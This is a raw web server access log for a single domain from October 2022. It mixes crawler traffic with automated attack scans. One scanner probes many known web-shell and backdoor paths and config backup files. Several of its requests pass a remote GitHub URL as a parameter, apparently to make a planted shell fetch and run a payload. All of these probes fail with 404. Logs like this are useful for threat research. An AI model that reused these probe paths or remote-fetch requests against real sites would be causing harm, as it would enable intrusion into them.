154.3.62.39 - - [10/Oct/2022:18:52:02 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)" "siempreholdings.com"
35.89.25.156 - - [10/Oct/2022:21:38:52 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
54.190.176.93 - - [10/Oct/2022:21:38:53 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.213.251.170 - - [10/Oct/2022:21:39:01 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.213.251.170 - - [10/Oct/2022:21:39:01 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.220.132.190 - - [10/Oct/2022:21:39:03 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.220.132.190 - - [10/Oct/2022:21:39:04 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.209.220.31 - - [10/Oct/2022:21:42:01 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
35.166.251.48 - - [10/Oct/2022:21:43:36 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
35.164.115.173 - - [10/Oct/2022:21:48:30 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:20 -0700] "HEAD /xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:21 -0700] "HEAD /wp/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:22 -0700] "HEAD /wordpress/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:23 -0700] "HEAD /old/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:25 -0700] "HEAD /new/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:25 -0700] "HEAD /blog/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:26 -0700] "HEAD /backup/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:27 -0700] "HEAD /web/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:28 -0700] "HEAD /site/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:29 -0700] "HEAD /2020/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" "siempreholdings.com"
20.170.2.119 - - [10/Oct/2022:21:49:30 -0700] "HEAD /demo/xmlrpc.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" "siempreholdings.com"
35.166.251.48 - - [10/Oct/2022:21:49:30 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
52.33.0.30 - - [10/Oct/2022:21:52:00 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
52.33.0.30 - - [10/Oct/2022:21:52:02 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
35.92.134.220 - - [10/Oct/2022:21:53:36 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
35.92.134.220 - - [10/Oct/2022:21:53:38 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
35.92.134.220 - - [10/Oct/2022:21:53:45 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
35.92.134.220 - - [10/Oct/2022:21:53:48 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.221.128.84 - - [10/Oct/2022:21:56:16 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.221.128.84 - - [10/Oct/2022:21:56:18 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "siempreholdings.com"
34.217.16.239 - - [11/Oct/2022:01:24:27 -0700] "GET / HTTP/1.1" 200 - "-" "-" "siempreholdings.com"
95.108.213.43 - - [11/Oct/2022:01:29:04 -0700] "GET /robots.txt HTTP/1.1" 200 46 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "siempreholdings.com"
5.45.207.116 - - [11/Oct/2022:01:29:08 -0700] "GET /favicon.ico HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots)" "siempreholdings.com"
52.38.97.170 - - [11/Oct/2022:02:25:09 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36" "siempreholdings.com"
194.38.20.161 - - [11/Oct/2022:04:50:17 -0700] "GET /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css HTTP/1.1" 404 73 "-" "ALittle Client" "siempreholdings.com"
168.138.27.184 - - [11/Oct/2022:05:05:17 -0700] "GET / HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36" "siempreholdings.com"
13.67.49.109 - - [11/Oct/2022:05:26:08 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (Linux; Android 10; M2004J19C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36" "siempreholdings.com"
54.36.148.142 - - [11/Oct/2022:06:28:12 -0700] "GET /robots.txt HTTP/1.1" 200 62 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "siempreholdings.com"
51.222.253.7 - - [11/Oct/2022:06:28:13 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "siempreholdings.com"
3.251.81.50 - - [11/Oct/2022:07:50:39 -0700] "GET /robots.txt HTTP/1.1" 200 62 "-" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" "siempreholdings.com"
3.251.81.50 - - [11/Oct/2022:07:50:39 -0700] "GET / HTTP/1.1" 200 20 "-" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" "siempreholdings.com"
194.38.20.161 - - [11/Oct/2022:08:13:20 -0700] "GET /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.css HTTP/1.1" 404 73 "-" "ALittle Client" "siempreholdings.com"
52.32.211.114 - - [11/Oct/2022:08:27:00 -0700] "GET / HTTP/1.1" 200 - "-" "Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00" "siempreholdings.com"
80.73.244.208 - - [11/Oct/2022:09:04:45 -0700] "GET / HTTP/1.1" 200 20 "http://SIEMPREHOLDINGS.COM" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" "siempreholdings.com"
45.149.82.47 - - [11/Oct/2022:09:04:45 -0700] "GET / HTTP/1.1" 200 20 "http://SIEMPREHOLDINGS.COM" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" "siempreholdings.com"
45.149.82.47 - - [11/Oct/2022:09:04:46 -0700] "GET / HTTP/1.1" 200 20 "http://SIEMPREHOLDINGS.COM" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" "siempreholdings.com"
213.180.203.88 - - [11/Oct/2022:09:07:52 -0700] "GET /robots.txt HTTP/1.1" 200 46 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.siempreholdings.com"
213.180.203.73 - - [11/Oct/2022:09:07:56 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.siempreholdings.com"
87.250.224.127 - - [11/Oct/2022:09:07:58 -0700] "GET /robots.txt HTTP/1.1" 200 46 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.siempreholdings.com"
213.180.203.88 - - [11/Oct/2022:09:08:02 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.siempreholdings.com"
213.180.203.88 - - [11/Oct/2022:09:10:02 -0700] "GET /robots.txt HTTP/1.1" 200 46 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "siempreholdings.com"
87.250.224.196 - - [11/Oct/2022:09:10:02 -0700] "GET /robots.txt HTTP/1.1" 200 46 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "siempreholdings.com"
213.180.203.88 - - [11/Oct/2022:09:10:05 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "siempreholdings.com"
95.108.213.57 - - [11/Oct/2022:09:10:06 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "siempreholdings.com"
54.36.148.115 - - [11/Oct/2022:09:32:27 -0700] "GET /robots.txt HTTP/1.1" 200 62 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.siempreholdings.com"
51.222.253.19 - - [11/Oct/2022:09:32:28 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.siempreholdings.com"
34.140.174.65 - - [11/Oct/2022:09:36:04 -0700] "HEAD / HTTP/1.1" 200 - "-" "Apache-HttpClient/4.5.5 (Java/11.0.9)" "www.siempreholdings.com"
51.222.253.20 - - [11/Oct/2022:10:32:17 -0700] "GET /robots.txt HTTP/1.1" 200 62 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.siempreholdings.com"
51.222.253.7 - - [11/Oct/2022:10:32:18 -0700] "GET / HTTP/1.1" 200 20 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "www.siempreholdings.com"
185.225.73.129 - - [11/Oct/2022:11:12:07 -0700] "GET / HTTP/1.1" 200 20 "-" "python-requests/2.27.1" "siempreholdings.com"
51.91.83.187 - - [11/Oct/2022:13:34:03 -0700] "GET /wp-login.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:52:59 -0700] "GET /style.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:00 -0700] "GET /moduless.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:05 -0700] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:07 -0700] "GET /admin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:08 -0700] "GET /index.php?3x=3x HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:10 -0700] "GET /boom.php?x HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:12 -0700] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:19 -0700] "GET /wp-content/db_cache.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:21 -0700] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:25 -0700] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:27 -0700] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:38 -0700] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:40 -0700] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:41 -0700] "GET /alfindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:44 -0700] "GET /alfa.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:46 -0700] "GET /wp-booking.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:47 -0700] "GET /cindex.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:48 -0700] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:51 -0700] "GET /wp-1ogin_bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:54 -0700] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:57 -0700] "GET /wp-includes/css/css.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:53:58 -0700] "GET /old-index.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:05 -0700] "GET /config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:10 -0700] "GET /wp-admin/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:11 -0700] "GET /wp-content/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:12 -0700] "GET /wp-includes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:17 -0700] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:19 -0700] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:26 -0700] "POST /wp-includes/css/wp-config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:36 -0700] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:41 -0700] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:44 -0700] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:46 -0700] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:48 -0700] "GET /legion.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:51 -0700] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:56 -0700] "GET /wp-includes/lfx.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:54:58 -0700] "GET /wp-includes/small.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:01 -0700] "GET /up.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:02 -0700] "GET /upload.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:04 -0700] "GET /config.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:10 -0700] "GET /test.php?Ghost=send HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:13 -0700] "GET /wp-content/langar.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:16 -0700] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"
167.235.30.44 - - [11/Oct/2022:14:55:18 -0700] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "siempreholdings.com"